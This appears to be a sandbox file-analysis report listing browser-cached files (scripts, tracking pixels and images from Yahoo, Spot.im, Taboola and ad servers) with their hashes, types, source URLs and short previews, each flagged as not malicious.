                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-beacon"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pr-bh.ybp.yahoo.com/sync/openx/1d1d5d09-d0b5-a85e-6fc0-6f55ed82d00e?gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.403989446485262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YBE+dmYn:Yvvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:031A8B6F8BAEA1DF8DA69CAFED49D579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BA6C224B8AC88AD4368A30775BBD4CBAD9BE3BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E5C0644466F49DFB193A225E813EB639BD14B0933EAA4CF457688BA716D49D95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B70D7F4F7B5A20657E835AEC1698BE17949EBA4E9B68E4DADD13B5BE9328A602CA815C9AD9CC6205F291199E18E7237CB4512CC840904F65AC4162F388B5801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.yahoo.com/tdv2_fp/api/resource/WeatherLocationService.favoriteLocation?returnMeta=true&lang=en-US&region=US&site=fp&ssl=1&crumb=eARa8MVzIY4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"data":[],"meta":{}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65430)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):155933
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4055442424165205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:5aKpJOxoCKSwf7mdzia08s3mdVk2dj80TijkmBjvLm:5dpJOHB088mdRBCBji
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F3B150FA96980788E5DECA9866A9EB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F9E1F5783E32815A9FA96CB5CABB31029DA096EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:39CCDB21A13D1C2BECB14BC9C521F76736F0B1040261118424909BDB4EC78075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F42677B4A5942932E60CC0DE12EA5507A1E1E47C3EFD1A77C4AED9AD14FD02A886FFA0317EA6444C5B0E2E6AADB1C9EB6C9F9FA3AADF33239139B95772630ECC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/137-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 137-bundle.js.LICENSE.txt */.(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[137],{28005:function(t,e,r){"use strict";var n=this&&this.__createBinding||(Object.create?function(t,e,r,n){void 0===n&&(n=r),Object.defineProperty(t,n,{enumerable:!0,get:function(){return e[r]}})}:function(t,e,r,n){void 0===n&&(n=r),t[n]=e[r]}),o=this&&this.__exportStar||function(t,e){for(var r in t)"default"===r||e.hasOwnProperty(r)||n(e,t,r)};Object.defineProperty(e,"__esModule",{value:!0}),o(r(32),e)},32:(t,e,r)=>{"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.now=e.performance=e.nativeGlobalThis=e.polyfill=void 0;var n=function(){function t(t){this.props=t,this.name=this.props.name,this.entryType=this.props.entryType,this.startTime=this.props.startTime,this.duration=this.props.duration}return t.prototype.toJSON=function(){return this.props},t}(),o=Date.now||function(){return Date.now()},i=o(),a="undefined"!=typeof DOM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):29512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.979932290111957
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:nwUYdQXvNdIlBnux1vnLikd1j0+a0wGDjhS6hx01oHCeb96MqL3z/b4mwr:nNYdQLIOhxfY+CGDjhSSxt1qLD/or
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5B403ADF10113F7B8A4ACC43CDAF802E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E5CF2BEAA12D87883F7A2C8D99C88160FFB63A58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:68EB972EF8F54B83454EA105F19F8EF5E44E2912E7C7C496BE3CD5711A068C57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:96FD2293A5CEF1F481A96D1726E4011C92DD7B98A97C77F5B0F9CC4EF84C18F96814C2EE341C4BD41D2614FA7B36B17A996F06839FB029C865AEBDE534E60D91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/7Z0aKacGGhmhPwsBUl2i5A--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-09/a129e590-7f30-11ef-8ab3-79e7dd104b7f.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF@s..WEBPVP8X.... .........ICCP0......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../....VP8 .p.......*....>a(.G$"(.$P]....gnj.l..4.w.dn.W..\.v0..._.B...6..U.w.f....}L}..\.....3.?.O.................z....w..Zm<I.y....^J.G.._..o...{$.G.....?"?..)./..LO....d......{......}n.......?........G.g..h....}k._.../...?.~..}/|+.......k.F...h.t.9..^.|.JG.._.%|...w.e4Z......o.n.2..l...Y......I...VFW.vh..aL....A.{..#d-...W...KM..'.n7.jxZ.n..W:....z."..;%n..F..'(..)gY~.`...F7.f.[V.Y..o..F.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):436098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.389978060744525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:erUNcKn8UMDpgA1TKgM7qezoJtf1n1u86ui2GNvNyp71t6RG/aHIrqGb/b3d44ha:erTnA+NCeF0pRq+V8NTLE0dts
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:17C0767E00620A91C61A5E1C266AEF99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D9C8236B06787B9CE5914ECE2A2A48B46A855104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:80A01FE9EF3A0CB424C64D5CD7F3DEEF820FDC6F2D8AE82EE3D2A0D835D7D1F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:330E4AED21BA50428D81C3D889606738CFAE50927F5B521E34F4EAB6547C105B76CA9E595502615C0F2A4F77B2DAF1429E0A038F145EB2E27F5088DE0C38AC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://wnsrvbjmeprtfrnfx.ay.delivery/floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:window.assertive=window.assertive||{};window.assertive.floorPriceVersion='11.9.0_30Mon_14';window.assertive.x771977720=(function(){var a=(function(){var a=[["(?<!motorola )Edge[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgiOS[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["EdgA[ /](\\d+[\\.\\d]+)","Microsoft Edge"],["Edg[ /](\\d+[\\.\\d]+)","Microsoft Edge"],[".*Servo.*Firefox(?:/(\\d+[\\.\\d]+))?","Firefox"],["(?!.*Opera[ /])Firefox(?:[ /](\\d+[\\.\\d]+))?","Firefox"],["(?:BonEcho|GranParadiso|Lorentz|Minefield|Namoroka|Shiretoko)[ /](\\d+[\\.\\d]+)","Firefox"],["CrMo(?:/(\\d+[\\.\\d]+))?","Chrome Mobile"],["Chrome(?:/(\\d+[\\.\\d]+))? Mobile","Chrome Mobile"],["Chrome(?!book)(?:/(\\d+[\\.\\d]+))?","Chrome"],["(?:(?:iPod|iPad|iPhone).+Version|MobileSafari)/(\\d+[\\.\\d]+)","Mobile Safari"],["(?:Version/(\\d+\\.[\\.\\d]+) .*)?Mobile.*Safari/","Mobile Safari"],["(?:iPod|(?<!Apple TV; U; CPU )iPhone|iPad)","Mobile Safari"],["Version/(\\d+\\.[\\.\\d]+) .*Safari/|(?:Safari|Safari(?:%20)?%E6%B5%8F%E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.756027257143914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:cCgBEbDATWo7pCz8qpI7/+fsQRBMUgyvDDqgMLGUGOCLYRIC1WZGb:cCgBz6o1CzXa7+fsQH/3nsXb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/scripts/eid.es5.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function _createForOfIteratorHelper(b,t){var e="undefined"!=typeof Symbol&&b[Symbol.iterator]||b["@@iterator"];if(!e){if(Array.isArray(b)||(e=_unsupportedIterableToArray(b))||t&&b&&"number"==typeof b.length){e&&(b=e);var c=0,m=function b(){};return{s:m,n:function t(){return c>=b.length?{done:!0}:{done:!1,value:b[c++]}},e:function b(t){throw t},f:m}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var W=!0,d=!1,n;return{s:function t(){e=e.call(b)},n:function b(){var t=e.next();return W=t.done,t},e:function b(t){d=!0,n=t},f:function b(){try{W||null==e.return||e.return()}finally{if(d)throw n}}}}function _unsupportedIterableToArray(b,t){if(b){if("string"==typeof b)return _arrayLikeToArray(b,t);var e=Object.prototype.toString.call(b).slice(8,-1);return"Object"===e&&b.constructor&&(e=b.constructor.name),"Map"===e||"Set"===e?Array.from(b):"Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5116), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.285839357353197
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:b87wo3rMCQoCbC4C8C6ZygyeroYSisnrFuZ00M95JVloHp5L///LVfnl7nUIlQpE:b8Uo3rMCbCbC4C8CsRxROloJ5735fnl5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E1A9838A32B891CDE5CE37830890EF63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A00330EB0F4B6406CCB2A7017FD9B23E7E77D159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C933B27D7336DDFBF60583D2F6AEB5E2D4AC5AA9D006AA07B3F9157DE998F1DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:799CB80D5ACCF0B770A613B427B8778F387716A57BAB564483184C03DAFAC0758114A36F6AC7FA1906865D6932EDDF503DC5AE072368D951ADDCD8316E330519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/714-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[714],{19781:(t,e,n)=>{n.d(e,{O:()=>o});var r=n(70655),s=n(52279);const o=(t,e,n,o)=>(0,r.mG)(void 0,void 0,void 0,(function*(){try{const{messages:r=[],users:i={}}=yield(0,s.er)(t,e,n,o);return{comment:r[0],users:i}}catch(t){return console.error("Error fetching comment:",t),{comment:null,users:{},error:!0}}}))},65027:(t,e,n)=>{n.d(e,{d:()=>r});const r=(0,n(45993).createContext)(null)},55561:(t,e,n)=>{n.d(e,{x:()=>r});const r=(0,n(45993).createContext)(null)},79763:(t,e,n)=>{n.d(e,{B:()=>r});const r=(0,n(45993).createContext)(null)},39500:(t,e,n)=>{n.d(e,{l:()=>r});const r=(0,n(45993).createContext)(null)},51462:(t,e,n)=>{n.d(e,{m:()=>r});const r=(0,n(45993).createContext)(null)},5339:(t,e,n)=>{n.d(e,{Z:()=>o});var r=n(44291);function s(t){return t.language}function o(){var t;return null!==(t=(0,r.U)(s))&&void 0!==t?t:"en"}},44291:(t,e,n)=>{n.d(e,{U:()=>o});var r=n(45993),s=n(55561);function o(t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12677), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20916317837861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3iuQlq2TtwcbF6IlJ+Knosw+wTzW9LxXUJsb5vaU8ZW:Shl1bF6IlJ+Kf9dE8oU8ZW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DA320D39602C7372E993ED8CA6026A92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E450CBC300424D62D5D40A0716345D0EA1A7DBD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B28A31976C8BC8B8869AA7367D73636F8462F54A42EDD9EB00C28DCAF1FDD7C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F46A3F8A77CFF2E3C746DA437BF57EDA2997EFE1FE36B083AF076CD8F09160545C2C6D7A5AED521D89612F3815195EDAB8B0930112743E80FA9BAF1625F4C347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-rapid"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.150864266978109
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLbGPGuXVGTq3xGzGeLGSoGQlnGMGlTIqdhgDa4xR2Gj4mf82GjGsO8KwS7xj:Di+hmQqUGSbQMH76GO2Gj4mk2Gj0lII
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:931D6AB365B23FC2F7473292055449AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BBF32F6AFD4B48B7E3CCA4E3724947EA8EF6181D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:53360A8C2CA513F21F0235F4DF7FCA1117A2E8F40E910D78566D9C6059431522
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:45169EBF0C9CBC39D577F95FC6B3E417E58FC78DE792697C2879A3A23917378FC7C26262760D1D6FE0C539E802A3AA772D1EEFD4D4C9B595FB0EF1FAF8EE0AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="7.054%" y1="46.73%" x2="65.562%" y2="25.496%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M44 15.23c0 8.462-6.77 15.232-15.23 15.232H9.307C4.23 30.462 0 26.23 0 21.154s4.23-9.308 9.308-9.308c1.523 0 3.046.339 4.4 1.185C14.892 5.585 21.154 0 28.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (448)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2067
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.200765163481271
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:NJXQRPyHQah9c9XSQPKcAgH/OIhS3Y55z9UT:LSP+rh9c95ycn/PDz9UT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4308930648EC788EBBBB62AA7B53BAD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:388C0A48B5432E695E0AECDCAD39FBAF9EFE7D17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F88567B9186398FCF2CDABF3E3CA010FCE0B23524C531A332A779E8D6E3EDA75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F424E63448FBF556A45E3E22387A326E69E7D3F0960488CBBDA724683D54CE91C920C354CA56DD493B5B0EDF7FFBB2D6257D53559EFB9CF2B0E3DCD82D3DEA2C
